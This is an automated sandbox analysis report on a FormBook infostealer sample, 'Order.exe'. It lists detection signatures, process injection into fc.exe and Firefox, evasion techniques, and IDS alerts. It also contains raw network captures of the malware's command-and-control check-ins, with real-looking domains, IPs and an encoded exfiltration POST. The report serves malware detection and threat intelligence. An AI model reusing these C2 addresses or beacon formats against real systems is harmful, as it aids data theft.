Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order.exe

Overview

General Information

Sample name:Order.exe
Analysis ID:1554471
MD5:7e1afc9b104325c33a1a94e672725e0b
SHA1:ab3b931b1dcf8cb9aaed3525ce657a85d2c4326a
SHA256:eaa050e146a491a37439f2c6e8be17f57b97c6f6ed12c9eaf982e55810031483
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Order.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 7E1AFC9B104325C33A1A94E672725E0B)
    • Order.exe (PID: 5996 cmdline: "C:\Users\user\Desktop\Order.exe" MD5: 7E1AFC9B104325C33A1A94E672725E0B)
      • lOYqgVWsbtwCn.exe (PID: 1396 cmdline: "C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 3380 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • firefox.exe (PID: 5908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T15:30:04.898207+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749735TCP
                2024-11-12T15:30:43.873121+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749921TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T15:30:57.257278+010020507451Malware Command and Control Activity Detected192.168.2.74996585.159.66.9380TCP
                2024-11-12T15:31:21.069853+010020507451Malware Command and Control Activity Detected192.168.2.74998091.184.0.20080TCP
                2024-11-12T15:31:34.753504+010020507451Malware Command and Control Activity Detected192.168.2.749984194.9.94.8580TCP
                2024-11-12T15:31:48.572323+010020507451Malware Command and Control Activity Detected192.168.2.749988170.39.213.4380TCP
                2024-11-12T15:32:01.943439+010020507451Malware Command and Control Activity Detected192.168.2.74999213.248.169.4880TCP
                2024-11-12T15:32:15.679445+010020507451Malware Command and Control Activity Detected192.168.2.74999638.47.232.19480TCP
                2024-11-12T15:32:29.198864+010020507451Malware Command and Control Activity Detected192.168.2.750000167.172.133.3280TCP
                2024-11-12T15:32:43.135959+010020507451Malware Command and Control Activity Detected192.168.2.750005162.0.211.14380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Order.exeReversingLabs: Detection: 24%
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Order.exeJoe Sandbox ML: detected
                Source: Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: UYVh.pdbSHA256 source: Order.exe
                Source: Binary string: fc.pdb source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UYVh.pdb source: Order.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3121159220.00000000001DE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\fc.exeCode function: 12_2_0321C500 FindFirstFileW,FindNextFileW,FindClose,12_2_0321C500
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 4x nop then pop edi11_2_00A39295
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exeCode function: 4x nop then xor eax, eax11_2_00A3CB3B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax12_2_03209D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h12_2_03C104DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49965 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49980 -> 91.184.0.200:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49996 -> 38.47.232.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49988 -> 170.39.213.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50000 -> 167.172.133.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50005 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49984 -> 194.9.94.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49992 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.tesetturhanzade.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 91.184.0.200 91.184.0.200
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
                Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49735
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49921
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /ur0f/?ZtwlQ=zogJdywBU1O1LleNfuKvTdvFae130slE6VGlZ0lHVZSYlVhh6xxrlMSZfTqXcXU1qXLRjwj9DFcRyKew14ZiEqz+1EU/fdPUgaJ8uSCdsp0ZpxD49H6BZny0S7BKl2GeJmA+Pu+eIAwF&ZX=G2OXK HTTP/1.1Accept: */*Accept-Language: en-USHost: www.tesetturhanzade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ggvc/?ZX=G2OXK&ZtwlQ=8JknlPcTs2UijknPxbO2oXM1DVs+MaDJyzfKPy/xZKvt3f8uoA3Cr57APZQOM8ic8BRlU5XE22T0HXZ7ivS1mrWVaOoSFtg0ZSHozP3aZjl6eIHnZqLtTRSsN9Et6GBTXH3WSnBcOkE9 HTTP/1.1Accept: */*Accept-Language: en-USHost: www.kantinestoel.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK HTTP/1.1Accept: */*Accept-Language: en-USHost: www.deeplungatlas.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ultrawin23.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sonoscan.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn HTTP/1.1Accept: */*Accept-Language: en-USHost: www.zz67x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jlqg/?ZtwlQ=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1stpe7mm3wauuEAY4FKC8z+iht6Qhedx9FkGs7kW/sJA05D+zdwUDUvmBi&ZX=G2OXK HTTP/1.1Accept: */*Accept-Language: en-USHost: www.omnibizlux.bizConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /4xim/?ZX=G2OXK&ZtwlQ=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP20/OCD6R2GxJg22BCsIc2mVLkjoCYHOMomb5GKySOlS/QA9Ktb+YS58Qw HTTP/1.1Accept: */*Accept-Language: en-USHost: www.vibixx.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.tangible.online
                Source: global trafficDNS traffic detected: DNS query: www.tesetturhanzade.xyz
                Source: global trafficDNS traffic detected: DNS query: www.kantinestoel.online
                Source: global trafficDNS traffic detected: DNS query: www.deeplungatlas.org
                Source: global trafficDNS traffic detected: DNS query: www.ultrawin23.shop
                Source: global trafficDNS traffic detected: DNS query: www.sonoscan.org
                Source: global trafficDNS traffic detected: DNS query: www.zz67x.top
                Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global trafficDNS traffic detected: DNS query: www.vibixx.site
                Source: global trafficDNS traffic detected: DNS query: www.rka6460.online
                Source: unknownHTTP traffic detected: POST /ggvc/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.kantinestoel.onlineOrigin: http://www.kantinestoel.onlineCache-Control: no-cacheConnection: closeContent-Length: 218Content-Type: application/x-www-form-urlencodedReferer: http://www.kantinestoel.online/ggvc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like GeckoData Raw: 5a 74 77 6c 51 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 35 64 78 5a 57 4d 55 57 6f 69 30 42 72 35 77 46 79 6d 37 69 77 51 58 45 42 6a 45 66 79 74 74 50 4e 68 4f 46 56 45 65 78 54 4e 48 36 35 56 65 78 51 3d 3d Data Ascii: ZtwlQ=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq05dxZWMUWoi0Br5wFym7iwQXEBjEfyttPNhOFVEexTNH65VexQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 12 Nov 2024 14:30:57 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-12T14:31:02.0765892Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:13 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:15 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:18 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:20 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:32:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:32:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:32:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
